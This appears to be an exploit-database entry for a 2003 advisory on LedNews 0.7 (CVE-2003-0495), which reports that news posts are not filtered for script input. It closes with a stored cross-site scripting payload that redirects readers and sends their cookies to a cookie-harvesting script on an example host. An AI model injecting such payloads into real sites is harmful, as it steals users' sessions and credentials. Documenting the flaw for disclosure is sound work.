LedNews 0.7 Post Script - Code Injection
| EKU-ID: 28248 | CVE: CVE-2003-0495;OSVDB-2154 | OSVDB-ID: |
| Author: gilbert vilvoorde | Published: 2003-06-16 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 28248 | CVE: CVE-2003-0495;OSVDB-2154 | OSVDB-ID: |
| Author: gilbert vilvoorde | Published: 2003-06-16 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/7920/info
It has been reported that LedNews does not properly filter input from news posts. Because of this, it may be possible for an attacker to steal authentication cookies or perform other nefarious activities.
<script>
document.location.replace('http://www.example.com/cgi-bin/cookiemonster.cgi?'+document.cookie);
</script>